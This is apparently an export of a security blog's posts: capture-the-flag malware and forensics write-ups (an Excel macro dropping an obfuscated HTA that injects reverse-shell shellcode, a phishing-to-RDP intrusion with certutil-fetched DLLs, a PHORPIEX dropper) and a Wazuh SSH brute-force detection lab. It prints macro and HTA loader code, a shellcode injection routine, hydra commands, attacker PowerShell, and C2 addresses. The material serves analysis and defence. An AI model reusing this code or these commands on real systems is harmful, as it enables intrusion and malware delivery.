It assembles the HTA payload from three hidden sources (ActiveSheet.Shapes(2).AlternativeText, OLE stream UZdcUQeJ.yTJtzjKX and Selection) and executes it via mshta.exe:\n1Sub Auto_Open() 2 Dim fHdswUyK, GgyYKuJh 3 Application.Goto (\u0026#34;JLprrpFr\u0026#34;) 4 GgyYKuJh = Environ(\u0026#34;temp\u0026#34;) \u0026amp; \u0026#34;\\LwTHLrGh.hta\u0026#34; 5 6 Open GgyYKuJh For Output As #1 7 Write #1, hdYJNJmt(ActiveSheet.Shapes(2).AlternativeText \u0026amp; UZdcUQeJ.yTJtzjKX \u0026amp; Selection) 8 Close #1 9 10 fHdswUyK = \u0026#34;msh\u0026#34; \u0026amp; \u0026#34;ta \u0026#34; \u0026amp; GgyYKuJh 11 x = Shell(fHdswUyK, 1) 12End Sub The three sources:\n- ActiveSheet.Shapes(2).AlternativeText — the \u0026ldquo;Alternative Text\u0026rdquo; field of the second Shape object on the worksheet. In Excel, Shape objects can be images, text boxes, charts, or other graphical elements embedded in a spreadsheet. In this case it stores a hidden encoded payload chunk invisible to the user.\n- UZdcUQeJ.yTJtzjKX — an OLE stream containing a long base64 string: lvbk5hbWUgIiYiQXMgU3RyaW4iJiJ...\n- Selection — whatever is currently selected in the Excel interface at the time the macro runs, such as cell text or a range of cells. The preceding Application.Goto (\u0026#34;JLprrpFr\u0026#34;) call selects that named range first, so the macro controls what Selection returns rather than relying on the user. 
vmonkey # vmonkey emulation confirmed the macro behavior:\n1+----------------------+-----------------------------------------------+---------------------------------+ 2| Action | Parameters | Description | 3+----------------------+-----------------------------------------------+---------------------------------+ 4| Start Regular | | All wildcard matches will match | 5| Emulation | | | 6| Found Entry Point | auto_open | | 7| Object.Method Call | [\u0026#39;JLprrpFr\u0026#39;] | Application.Goto | 8| Environ | [\u0026#39;temp\u0026#39;] | Interesting Function Call | 9| OPEN | C:\\Users\\admin\\AppData\\Local\\Temp\\LwTHLrGh.ht | Open File | 10| | a | | 11| Object.Method Call | [-2147221504, \u0026#39;\u0026#39;, \u0026#39;\u0026#39;] | Err.Raise | 12| Dropped File Hash | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1 | File Name: LwTHLrGh.hta | 13| | d49c01e52ddb7875b4b | | 14| Execute Command | mshta C:\\Users\\admin\\AppData\\Local\\Temp\\LwTHL | Shell function | 15| | rGh.hta | | 16| Found Entry Point | label1_click | | 17| Found Entry Point | Label1_Click | | 18+----------------------+-----------------------------------------------+---------------------------------+ Sandbox \u0026amp; HTA Analysis # The malicious Excel file was executed in a sandbox. 
The dropped HTA file was extracted from the %temp% folder:\n1LwTHLrGh.hta: HTML document, ASCII text, with CRLF, LF line terminators hta file analysis # The HTA begins by creating a hidden Excel instance and a Wscript.Shell object, then modifies the registry to set AccessVBOM to 1, lowering macro security and allowing programmatic VBA injection:\n1Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule 2Set objExcel = CreateObject(\u0026#34;\u0026#34;Excel.Application\u0026#34;\u0026#34;) 3objExcel.Visible = False 4Set WshShell = CreateObject(\u0026#34;\u0026#34;Wscript.Shell\u0026#34;\u0026#34;) 5 6\u0026#39; Get the old AccessVBOM value 7RegPath = \u0026#34;\u0026#34;HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\u0026#34;\u0026#34; \u0026amp; objExcel.Version \u0026amp; \u0026#34;\u0026#34;\\Excel\\Security\\AccessVBOM\u0026#34;\u0026#34; 8 9\u0026#39; Weaken the target 10WshShell.RegWrite RegPath, 1, \u0026#34;\u0026#34;REG_DWORD\u0026#34;\u0026#34; 11 12\u0026#39; Run the macro 13Set objWorkbook = objExcel.Workbooks.Add() 14Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1) The rest of the HTA code is heavily obfuscated using four techniques: concatenation splitting (\u0026amp;) to break AV signatures, Chr() calls for special characters, VBA line continuation (_), and keyword fragmentation across concatenation boundaries:\n1xlmodule.CodeModule.AddFromString \u0026#34;\u0026#34;Private \u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;Type PRO\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;CESS_INF\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34; 2ORMATION\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp;\u0026#34;\u0026#34; hPro\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;cess As \u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;Long\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp;\u0026#34;\u0026#34; hThr\u0026#34;\u0026#34;\u0026amp; 3\u0026#34;\u0026#34;ead As 
L\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;ong\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp;\u0026#34;\u0026#34; dwPr\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;ocessId \u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;As Long\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp; 4\u0026#34;\u0026#34; dwTh\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;readId A\u0026#34;\u0026#34;\u0026amp;\u0026#34;\u0026#34;s Long\u0026#34;\u0026#34;\u0026amp;Chr(10)\u0026amp; _.... Deobfuscation # A Python script was used to deobfuscate the HTA by resolving Chr() calls, stripping concatenation operators and line continuations:\n1import re 2 3with open(\u0026#34;LwTHLrGh.hta\u0026#34;, \u0026#34;r\u0026#34;) as f: 4 data = f.read() 5 6data = re.sub(r\u0026#39;Chr\\((\\d+)\\)\u0026#39;, lambda m: chr(int(m.group(1))), data) 7data = data.replace(\u0026#39;\u0026#34;\u0026#39;, \u0026#39;\u0026#39;).replace(\u0026#39;\u0026amp;\u0026#39;, \u0026#39;\u0026#39;).replace(\u0026#39;_\u0026#39;, \u0026#39;\u0026#39;) 8 9with open(\u0026#34;clear.vba\u0026#34;, \u0026#34;w\u0026#34;) as f: 10 f.write(data) The deobfuscated VBA reveals shellcode injection into rundll32.exe:\n1myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36, 2-12,91,49,-55,-79,98,49,123,24,3,123,24,-125, 3-61,36,-76,-73,-126,-52,-70,56,123,12,-37...) 
4 5If Len(Environ(\u0026#34;ProgramW6432\u0026#34;)) \u0026gt; 0 Then 6 sProc = Environ(\u0026#34;windir\u0026#34;) \u0026amp; \u0026#34;\\SysWOW64\\rundll32.exe\u0026#34; 7Else 8 sProc = Environ(\u0026#34;windir\u0026#34;) \u0026amp; \u0026#34;\\System32\\rundll32.exe\u0026#34; 9End If 10 11res = RunStuff(sNull, sProc, ByVal 0, ByVal 0, ByVal 1, ByVal 4, ByVal 0, sNull, sInfo, pInfo) 12 13rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), H1000, H40) 14 15For offset = LBound(myArray) To UBound(myArray) 16 myByte = myArray(offset) 17 res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0) 18Next offset 19 20res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) 21...[snip]... The shellcode is stored as a signed byte array. A Python script converts it to raw bytes:\n1myArray = [ 2 -35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98,49,123,24,3,123,24,-125, 3 -61,36,-76,-73,-126,-52,-70,56,123,12,-37,-79,-98,61,-37,-90,-21,109,-21,-83,-66,-127, 4 -128,-32,42,18,-28,44,92,-109,67,11,83,36,-1,111,-14,-90,2,-68,-44,-105,-52,-79,21,-48, 5 49,59,71,-119,62,-18,120,-66,11,51,-14,-116,-102,51,-25,68,-100,18,-74,-33,-57,-76,56,12, 6 124,-3,34,81,-71,-73,-39,-95,53,70,8,-8,-74,-27,117,53,69,-9,-78,-15,-74,-126,-54,2, 7 ...[snip]... 8] 9 10sc = bytes([b \u0026amp; 0xFF for b in myArray]) 11 12with open(\u0026#34;sc.bin\u0026#34;, \u0026#34;wb\u0026#34;) as f: 13 f.write(sc) Shellcode Analysis # Decoder Stub # Loading sc.bin in IDA revealed an XOR-based decoder stub. 
It uses fnstenv to obtain the current instruction pointer via the FPU environment, then iterates over the payload XORing each block with a rolling key:\n1seg000:0000000000000000 ffree st(1) 2seg000:0000000000000002 mov edi, 7E425620h ; initial XOR key 3seg000:0000000000000007 fnstenv byte ptr [rsp-0Ch] 4seg000:000000000000000B pop rbx 5seg000:000000000000000C xor ecx, ecx 6seg000:000000000000000E mov cl, 62h ; loop counter = 98 7seg000:0000000000000010 xor [rbx+18h], edi ; decrypt next block 8seg000:0000000000000013 add edi, [rbx+18h] ; update key 9seg000:0000000000000016 add ebx, 24h 10seg000:0000000000000019 mov ah, 0B7h scdbg Emulation # scdbg emulation of the decoded shellcode revealed a reverse shell connecting to evil-domain.no over port 443:\n14010b6 LoadLibraryA(ws2_32) 24010c6 WSAStartup(190) 34010d5 WSASocket(af=2, tp=1, proto=0, group=0, flags=0) 4401109 gethostbyname(evil-domain.no/HTB{g0_G3t_th3_ph1sh3R}) 5401121 connect(h=42, host: 127.0.0.1, port: 443) 640113c recv(h=42, buf=12fc60, len=4, fl=0) 740117f closesocket(h=42) 8401109 gethostbyname(evil-domain.no/HTB{g0_G3t_th3_ph1sh3R}) = 1000 IOCs # Files\n- invoice-42369643.html — initial phishing document\n- invoice-42369643.xlsm — macro-enabled Excel workbook\n- C:\\Users\\*\\AppData\\Local\\Temp\\LwTHLrGh.hta — dropped HTA payload\n- LwTHLrGh.hta SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\nRegistry\n- HKCU\\Software\\Microsoft\\Office\\\u0026lt;version\u0026gt;\\Excel\\Security\\AccessVBOM set to 1\nNetwork\n- C2 Domain: evil-domain.no\n- C2 Port: 443/tcp\nProcesses\n- mshta.exe — HTA execution\n- rundll32.exe — shellcode injection target\n","date":"February 20, 2026","externalUrl":null,"permalink":"/investigations/htb-obfsc4t10n/","section":"","summary":"A phishing HTML file masquerading as an invoice delivers a macro-enabled Excel workbook that drops and executes a multi-stage obfuscated HTA payload, ultimately injecting a reverse shell shellcode into rundll32.exe and 
establishing a C2 connection.","title":"HTB-oBfsC4t10n","type":"investigations"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/olevba/","section":"Tags","summary":"","title":"Olevba","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/scdbg/","section":"Tags","summary":"","title":"Scdbg","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/shellcode-analysis/","section":"Tags","summary":"","title":"Shellcode Analysis","type":"tags"},{"content":"","date":"February 20, 2026","externalUrl":null,"permalink":"/tags/vmonkey/","section":"Tags","summary":"","title":"Vmonkey","type":"tags"},{"content":" Objective # Simulate an SSH brute force attack from a Kali Linux machine against an Ubuntu 22.04 agent, observe Wazuh detection capabilities, identify gaps in the default ruleset, and configure automated response.\nEnvironment # (role: OS, IP)\n- Attacker: Kali Linux, 192.168.248.129\n- Agent: Ubuntu 22.04 Server, 192.168.248.140\n- Wazuh: Ubuntu 24.04 Server, 192.168.248.50\nAttack Simulation # The attack was simulated using Hydra from the Kali Linux machine targeting the Ubuntu 22.04 agent over SSH. Two brute force attempts were executed against different usernames:\n1# Attempt 1 — targeting root 2hydra -l root -P /usr/share/wordlists/fasttrack.txt ssh://192.168.248.140 3 4# Attempt 2 — targeting user \u0026#39;w\u0026#39; 5hydra -l w -P /usr/share/wordlists/fasttrack.txt ssh://192.168.248.140 Each run tried 262 passwords at ~220 attempts/min. Both attempts failed — no valid credentials were found. Total duration: ~1 min 17 sec per run.\nWhat Wazuh Detected # Wazuh generated 1,010 authentication failure alerts across both runs. 0 successful logins were recorded. Two distinct spikes are visible on the timeline (~07:08 and ~07:15), corresponding to each Hydra run. 
MITRE ATT\u0026amp;CK: T1110.001 - Brute Force: Password Guessing via SSH.\nSeven rule IDs were triggered during the attack:\n- 5760 (level 5): sshd: authentication failed\n- 5551 (level 5): sshd: Invalid user\n- 5503 (level 5): sshd: Connection closed\n- 5768 (level 5): sshd: Maximum authentication attempts exceeded\n- 2501 (level 5): User missed the password\n- 2502 (level 10): User missed the password more than once\n- 40111 (level 10): Multiple authentication failures\nRules 5760, 5551, 5503, 5768, and 2501 fire per individual event (level 5). Rules 2502 and 40111 are correlation rules that aggregate multiple failures into a higher severity alert (level 10). Notable: 0 alerts reached level 12 or above — addressed in the Tuning section.\nExpanded view of a single Rule 5760 alert:\n- Source IP: 192.168.248.129\n- Target user: w\n- Source port: 41772\n- Full log: Failed password for w from 192.168.248.129 port 41772 ssh2\n- MITRE: T1110.001 - Password Guessing / T1021.004 - SSH\n- Fired times: 533\n1{ 2 \u0026#34;agent\u0026#34;: { \u0026#34;ip\u0026#34;: \u0026#34;192.168.248.140\u0026#34;, \u0026#34;name\u0026#34;: \u0026#34;agent1\u0026#34;, \u0026#34;id\u0026#34;: \u0026#34;001\u0026#34; }, 3 \u0026#34;data\u0026#34;: { \u0026#34;srcip\u0026#34;: \u0026#34;192.168.248.129\u0026#34;, \u0026#34;dstuser\u0026#34;: \u0026#34;w\u0026#34;, \u0026#34;srcport\u0026#34;: \u0026#34;41772\u0026#34; }, 4 \u0026#34;rule\u0026#34;: { 5 \u0026#34;id\u0026#34;: \u0026#34;5760\u0026#34;, 6 \u0026#34;level\u0026#34;: 5, 7 \u0026#34;description\u0026#34;: \u0026#34;sshd: authentication failed.\u0026#34;, 8 \u0026#34;firedtimes\u0026#34;: 533, 9 \u0026#34;mitre\u0026#34;: { 10 \u0026#34;technique\u0026#34;: [\u0026#34;Password Guessing\u0026#34;, \u0026#34;SSH\u0026#34;], 11 \u0026#34;id\u0026#34;: [\u0026#34;T1110.001\u0026#34;, \u0026#34;T1021.004\u0026#34;], 12 \u0026#34;tactic\u0026#34;: [\u0026#34;Credential Access\u0026#34;, \u0026#34;Lateral Movement\u0026#34;] 13 } 14 }, 15 \u0026#34;full_log\u0026#34;: \u0026#34;Feb 20 12:15:46 w 
sshd[7202]: Failed password for w from 192.168.248.129 port 41772 ssh2\u0026#34;, 16 \u0026#34;timestamp\u0026#34;: \u0026#34;2026-02-20T12:15:48.177+0000\u0026#34; 17} What Was Missed \u0026amp; Why # No Level 12 or above alerts were triggered during the initial simulation. Wazuh\u0026rsquo;s built-in ruleset caps brute force detection at Level 10, meaning the attack would not trigger a critical notification by default — a potential blind spot in a real SOC environment.\nTuning \u0026amp; Custom Rules # To address the detection gap, a custom rule was created in /var/ossec/etc/rules/local_rules.xml:\n1\u0026lt;group name=\u0026#34;sshd,authentication_failed,\u0026#34;\u0026gt; 2 \u0026lt;rule id=\u0026#34;100001\u0026#34; level=\u0026#34;12\u0026#34;\u0026gt; 3 \u0026lt;if_matched_sid\u0026gt;40111\u0026lt;/if_matched_sid\u0026gt; 4 \u0026lt;description\u0026gt;SSH Brute Force: High volume of authentication failures from same source\u0026lt;/description\u0026gt; 5 \u0026lt;mitre\u0026gt; 6 \u0026lt;id\u0026gt;T1110.001\u0026lt;/id\u0026gt; 7 \u0026lt;/mitre\u0026gt; 8 \u0026lt;/rule\u0026gt; 9\u0026lt;/group\u0026gt; Response # After the custom rule 100001 triggered, Wazuh executed the built-in firewall-drop active response on agent1, automatically blocking the attacker\u0026rsquo;s IP via iptables. 
The active response was configured in /var/ossec/etc/ossec.conf:\n1\u0026lt;active-response\u0026gt; 2 \u0026lt;command\u0026gt;firewall-drop\u0026lt;/command\u0026gt; 3 \u0026lt;location\u0026gt;local\u0026lt;/location\u0026gt; 4 \u0026lt;rules_id\u0026gt;100001\u0026lt;/rules_id\u0026gt; 5 \u0026lt;timeout\u0026gt;180\u0026lt;/timeout\u0026gt; 6\u0026lt;/active-response\u0026gt; The effect was immediately visible in Hydra\u0026rsquo;s output — attempt rate dropped from 107 tries/min to 44 tries/min as connections began failing, and eventually all tasks were disabled:\n1[ERROR] all children were disabled due too many connection errors 2[ERROR] 1 targets did not complete Level 12 alerts: 2 — rule 100001 fired successfully.\nExpanded view of Rule 100001 alert:\n- Rule ID: 100001 (custom)\n- Level: 12\n- Source IP: 192.168.248.129\n- Target user: w\n- Fired times: 2\n- mail: true — level 12 triggers email notification if configured\n- Full log: maximum authentication attempts exceeded for w from 192.168.248.129\n- MITRE: T1110.001 - Credential Access: Password Guessing\nThe block was automatically lifted after the configured timeout of 180 seconds. To make a permanent block, the timeout value can be set to 0.\nConclusion # Wazuh successfully detected the SSH brute force attack out of the box, generating 1,010 alerts across 7 rule IDs. 
However, the default ruleset did not escalate the alert to critical severity (level 12), which would be a gap in a real SOC environment where level 12 triggers priority notifications.\nAdding a single custom rule resolved this gap and enabled automated IP blocking via active response — stopping the attack mid-execution without any manual intervention.\nKey takeaways:\n- Default Wazuh rules detect brute force but cap at level 10\n- Custom rules can bridge the gap with minimal configuration\n- Active response provides automated containment within seconds of detection\n- Timeout-based blocks are suitable for automated response; permanent blocks require manual review to avoid blocking legitimate users\n","date":"February 20, 2026","externalUrl":null,"permalink":"/blue_team/wazuh_ssh-brute-force/","section":"","summary":"Simulated an SSH brute force attack using Hydra, observed Wazuh detection across 7 rule IDs, identified a gap in default alerting (max level 10), wrote a custom rule to escalate severity to level 12, and configured automated IP blocking via active response.","title":"Wazuh: SSH Brute Force","type":"blue_team"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/chromehistoryview/","section":"Tags","summary":"","title":"ChromeHistoryView","type":"tags"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/cryptneturlcache/","section":"Tags","summary":"","title":"CryptnetUrlCache","type":"tags"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/dll-hijacking/","section":"Tags","summary":"","title":"DLL Hijacking","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-16 TL;DR # A victim clicked a phishing link impersonating a corporate login page, leading to credential theft. 
The attacker used stolen credentials to gain RDP access, then escalated privileges via SeManageVolumeExploit, deployed malicious DLLs using certutil, and established persistence through a hidden VBS script in the Startup folder.\nInitial Access # Phishing URL # By analyzing the victim\u0026rsquo;s Chrome history using ChromeHistoryView, I identified that on 2025-05-23 14:20:07 the victim visited the legitimate company intranet. Two days later, on 2025-05-25 13:36:42, they clicked a phishing URL that harvested their credentials:\n1http://intranet.wowzainc.co.th/landing.php 2025-05-23 14:20:07 2https://login.wowzalnc.co.th/logon.php 2025-05-25 13:36:42 \u0026lt;- phishing 3https://mail.wowzainc.co.th/inbox.php 2025-05-23 14:21:17 The phishing domain wowzalnc.co.th impersonates the legitimate wowzainc.co.th by replacing the letter i with l.\nRDP Access # Using the harvested credentials, the attacker gained remote access via RDP on 2025-05-27 11:59:57. This was confirmed by Event ID 4624 in Security.evtx with Logon Type 10 (RemoteInteractive):\n1# Security.evtx / Event ID 4624 2Logon Type: 10 3Account Name: otello.j 4Account Domain: WORKSTATION6 5Logon ID: 0x2A017F 6Security ID: S-1-5-21-888844466-1397619329-4015378808-1001 Privilege Escalation # SeManageVolumeExploit # On 2025-05-28 12:36:59, the attacker visited freehackingtool.com and browsed its tools section:\n1http://freehackingtool.com/ 2025-05-28 12:36:59 2http://freehackingtool.com/tools/ 2025-05-28 12:37:09 3http://freehackingtool.com/tools/ 2025-05-28 12:53:36 4http://freehackingtool.com/ 2025-05-28 12:55:02 From this site, download attempts were made for three files: SeManageVolumeExploit.exe, a.vbs, and PrintConfig.dll.\nAt 2025-05-28 12:43:33, SeManageVolumeExploit.exe was successfully downloaded. This tool exploits the SeManageVolumePrivilege — a Windows privilege that allows volume-level operations such as mounting, dismounting, and defragmenting volumes. 
When abused, it can grant an attacker full control over the C: drive, enabling them to bypass access controls, manipulate the file system, and potentially execute arbitrary code.\nMalware Deployment # PrintConfig.dll — Malicious DLL via certutil # At 2025-05-28 12:44:01, the browser download of PrintConfig.dll was interrupted with interrupt code 41 (USER_SHUTDOWN — the browser was closed before the download completed).\nTo work around this, the attacker used the LOLBIN certutil.exe to download the file at 2025-05-28 12:45:37. This was confirmed by analyzing the CryptnetUrlCache/Metadata artifacts. The legitimate DLL at C:\\Windows\\system32\\spool\\drivers\\x64\\12\\PrintConfig.dll was then removed and replaced with the malicious version.\nAt 2025-05-28 15:19:35, Windows Defender detected and flagged the replaced DLL:\n1Name: Trojan:Win64/Meterpreter.E 2ID: 2147721833 3Severity: Severe 4Path: C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll 5 service: PrintNotify 6Detection Origin: Local machine 7User: NT AUTHORITY\\SYSTEM 8Engine Version: AM: 1.1.25050.2 tzres.dll — Secondary Malicious DLL # At 2025-05-28 12:54:23, a second malicious DLL tzres.dll was downloaded via certutil.exe and placed at C:\\Windows\\system32\\wbem\\tzres.dll.\nPrintConfig.dll Execution # From the PowerShell console history, I found that the attacker triggered execution of the malicious PrintConfig.dll by instantiating a COM object associated with the Windows spooler service:\n1dir 2$type = [Type]::GetTypeFromCLSID(\u0026#34;{854A20FB-2D44-457D-992F-EF13785D2B51}\u0026#34;) 3$object = [Activator]::CreateInstance($type) 4dir 5reg add \u0026#34;HKCU\\control panel\\desktop\u0026#34; /v wallpaper /t REG_SZ /d \u0026#34;C:/Users/Public/Pictures/gg.bmp\u0026#34; /f The CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} is associated with the PrintNotify service. Instantiating it caused spoolsv.exe to load and execute the malicious PrintConfig.dll. 
Additionally, the attacker downloaded an image gg.bmp and set it as the desktop wallpaper — likely to signal successful compromise.\nPersistence # a.vbs — Startup Script # At 2025-05-28 12:55:05, a.vbs was downloaded and moved to the Windows Startup folder to ensure execution on every boot:\n1C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\a.vbs The script creates a WScript.Shell object and silently runs systeminfo:\nSet WshShell = CreateObject(\u0026#34;WScript.Shell\u0026#34;) WshShell.Run \u0026#34;cmd.exe /c systeminfo\u0026#34;, 0, False systeminfo collects data via WMI, which triggers the WMI Provider Host (wmiprvse.exe). Since wmiprvse.exe executes all providers from the \\wbem\\ directory, this causes the malicious tzres.dll to be loaded automatically.\nAt 2025-05-28 12:56:11, the Hidden attribute was set on a.vbs to conceal it from the victim:\n1a.vbs 12:56:11 BasicInfoChange Hidden|Archive Attack Timeline # 12025-05-23 14:20:07 - Victim visits legitimate intranet site 22025-05-25 13:36:42 - Victim clicks phishing URL, credentials harvested 32025-05-27 11:59:57 - Attacker gains RDP access as otello.j (Logon Type 10) 42025-05-28 12:36:59 - Attacker visits freehackingtool.com 52025-05-28 12:43:33 - SeManageVolumeExploit.exe successfully downloaded 62025-05-28 12:44:01 - Browser download of PrintConfig.dll interrupted (code 41) 72025-05-28 12:45:37 - PrintConfig.dll downloaded via certutil, replaces legitimate DLL 82025-05-28 12:54:23 - tzres.dll downloaded via certutil, placed in wbem\\ 92025-05-28 12:55:05 - a.vbs downloaded and placed in Startup folder 102025-05-28 12:56:11 - Hidden attribute set on a.vbs 112025-05-28 15:19:35 - Windows Defender detects PrintConfig.dll as Trojan:Win64/Meterpreter.E IOCs # Domains\n- login.wowzalnc.co.th — phishing domain (typosquat of wowzainc.co.th)\n- freehackingtool.com — malware hosting\nFiles\n- C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll — Trojan:Win64/Meterpreter.E\n- 
C:\\Windows\\system32\\wbem\\tzres.dll — malicious secondary DLL\n- C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\a.vbs — persistence script\n- SeManageVolumeExploit.exe — privilege escalation tool\nRegistry\n- HKCU\\control panel\\desktop\\wallpaper — set to C:/Users/Public/Pictures/gg.bmp\nAccounts\n- otello.j — compromised via phishing\nRecommendations # Immediate Actions\n- Isolate the compromised workstation from the network\n- Block domains wowzalnc.co.th and freehackingtool.com at the perimeter\n- Remove a.vbs from the Startup folder\n- Restore legitimate PrintConfig.dll and tzres.dll from a clean source\n- Reset credentials for otello.j and audit for lateral movement\n- Review all RDP logon events (Event ID 4624, Logon Type 10) across the environment\nPreventive Measures\n- Enable MFA on all remote access solutions to mitigate phishing-based credential theft\n- Restrict certutil.exe usage via AppLocker or WDAC to prevent LOLBIN abuse\n- Enable and monitor Windows Defender alerts centrally via SIEM\n- Audit and restrict SeManageVolumePrivilege assignments\n- Deploy DNS filtering to block known phishing and malware-hosting domains ","date":"February 16, 2026","externalUrl":null,"permalink":"/investigations/htb-workfromhome/","section":"","summary":"A victim clicked a phishing link impersonating a corporate login page, leading to credential theft. 
The attacker used stolen credentials to gain RDP access, then escalated privileges via SeManageVolumeExploit, deployed malicious DLLs using certutil, and established persistence through a hidden VBS script in the Startup folder.","title":"HTB-WorkFromHome","type":"investigations"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/pecmd/","section":"Tags","summary":"","title":"PECmd","type":"tags"},{"content":"","date":"February 16, 2026","externalUrl":null,"permalink":"/tags/registryexplorer/","section":"Tags","summary":"","title":"RegistryExplorer","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-08 Description:\nAfter a security incident, unusual activity on Samira’s workstation led to the discovery of a suspicious binary operating stealthily in the background. The executable evades standard detection while maintaining persistence and network communication. Your mission is to reverse the binary and extract the attacker’s TTPs for the endpoint security team.\nTL;DR # Two-stage dropper - optimize.exe downloads syscrondvr.exe (PHORPIEX) and sets persistence via Run keys. Main payload implements clipboard hijacking for crypto wallets, USB/network spreading, and UPnP NAT traversal for C2 access. 
Beacons to 185.156.72.39 and 45.141.233.6 every 15 minutes.\ninitial analysis # 1$ file * 2optimize.exe: PE32 executable for MS Windows 5.00 (GUI), Intel i386, 3 sections libraries # - WS2_32.dll + WININET.dll potentially used to communicate with the C2 server.\n- urlmon.dll indicates file downloading capabilities, likely via URLDownloadToFile, suggesting the sample is a downloader that retrieves and executes a secondary payload.\nimports # 1socket, bind, listen, accept, connect WS2_32.dll 2send, recv, sendto, recvfrom WS2_32.dll 3WSAStartup, WSASocketA, WSASend, WSARecv WS2_32.dll 4InternetOpenA, InternetConnectA WININET.dll 5HttpOpenRequestA, HttpSendRequestA WININET.dll 6URLDownloadToFileW urlmon.dll 1RegOpenKeyExW ADVAPI32.dll 2RegSetValueExW ADVAPI32.dll 3RegQueryValueExW ADVAPI32.dll 4RegCloseKey ADVAPI32.dll - interaction with the Registry, potentially for persistence or for modifying system security settings\n1SetClipboardViewer USER32.dll 2ChangeClipboardChain USER32.dll 3OpenClipboard USER32.dll 4GetClipboardData USER32.dll 5SetClipboardData USER32.dll 6IsClipboardFormatAvailable USER32.dll - clipboard hijacking capability\n1RegisterRawInputDevices USER32.dll 2GetMessageA USER32.dll - potentially keylogging via RegisterRawInputDevices\n1CreateFileW, WriteFile KERNEL32.dll 2DeleteFileW, CopyFileW, MoveFileExW KERNEL32.dll 3FindFirstFileW, FindNextFileW KERNEL32.dll 4CreateDirectoryW, RemoveDirectoryW KERNEL32.dll 5SetFileAttributesW KERNEL32.dll 6MapViewOfFile, CreateFileMappingW KERNEL32.dll - file system operations\n- SetFileAttributesW can be used for hiding files\n1CreateProcessW KERNEL32.dll 2CreateThread KERNEL32.dll 3ShellExecuteW SHELL32.dll - payload execution via CreateProcessW or ShellExecuteW\n- combined with download functions -\u0026gt; dropper/loader behavior\n1CryptAcquireContextW ADVAPI32.dll 2CryptGenRandom ADVAPI32.dll 3CryptReleaseContext ADVAPI32.dll 4rand, srand msvcrt.dll - CryptGenRandom - cryptographically secure random generation, potentially 
used for encryption of C2 traffic\n- rand/srand may indicate custom encryption algorithm\n1CreateMutexA KERNEL32.dll 2NtQueryVirtualMemory ntdll.dll 3Sleep, GetTickCount KERNEL32.dll - CreateMutexA - ensure single instance\n- NtQueryVirtualMemory - detect debuggers/sandboxes via memory inspection\n- Sleep + GetTickCount - potential timing-based sandbox evasion\nstrings # Hardcoded C2 Servers:\n1http://185.156.72.39/ 2http://45.141.233.6/ 3www.update.microsoft.com (likely decoy/masquerading) 4239.255.255.250 User-Agent String:\n1Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 2(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 - Recent Chrome UA (v128) for blending with legitimate traffic\n- HTTP-based C2 communication confirmed\nRegistry Run Keys:\n1Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ 2Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer Zone.Identifier Bypass:\n1%s:Zone.Identifier Dropped Files:\n1%temp%\\syscrondvr.exe 2%temp%\\tbtnds.dat 3%temp%\\tbtcmds.dat 4DriveSecManager.exe (USB) Dropper Command:\n1%s.lnk 2/c start %s \u0026amp; start %s\\DriveSecManager.exe Cryptocurrency Wallet Addresses Embedded:\n1Bitcoin: bc1q9tgkga69k094n5v0pn7ewmpp2kn66sh9hu65gq 2bitcoincash: qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r 3ronin: a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd1a 4Cosmos: cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr 5Terra: terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5 6Zilliqa: zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3 7... 
